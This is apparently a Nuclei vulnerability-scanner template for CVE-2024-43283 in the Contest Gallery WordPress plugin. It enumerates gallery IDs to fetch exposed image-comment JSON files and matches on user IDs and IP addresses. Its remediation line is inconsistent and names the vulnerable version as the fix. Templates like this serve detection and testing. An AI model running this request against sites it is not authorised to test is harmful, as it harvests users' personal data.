Files
nuclei-templates/CVE-2024-43283.yaml
2026-01-30 01:53:31 +00:00

54 lines
1.8 KiB
YAML

id: CVE-2024-43283
info:
name: Contest Gallery - Broken Access Control
author: popcorn94
severity: medium
description: |
Contest Gallery from n/a through 23.1.2 contains an exposure of sensitive information to an unauthorized actor caused by insufficient access controls, letting attackers access sensitive data, exploit requires no specific conditions.
impact: |
Unauthorized actors can access sensitive information, leading to privacy breaches and potential misuse of data.
remediation: |
Update to the latest version 23.1.2 or later to address the issue.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contest-gallery/contest-gallery-2312-unauthenticated-information-exposure
- https://nvd.nist.gov/vuln/detail/CVE-2024-43283
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-43283
cwe-id: CWE-200
metadata:
verified: true
max-request: 1
tags: cve,cve2024,wordpress,wp,wp-plugin,contest-gallery,disclosure
http:
- raw:
- |
GET /wp-content/uploads/contest-gallery/gallery-id-{{path}}/json/image-comments/image-comments-{{path}}.json HTTP/1.1
Host: {{Hostname}}
payloads:
path: helpers/wordlists/numbers.txt
attack: batteringram
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'WpUserId":'
- 'userIP":'
condition: and
case-insensitive: true
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
# digest: 4b0a00483046022100b3cdc5f434793c72d09128666ec5461763274aec44b65b56a71b6a99624de2da02210092d8408b2af061c118582ef17dfa6a2977d44c956f4a468a3fdc95b0c706f911:922c64590222798bb761d5b6d8e72950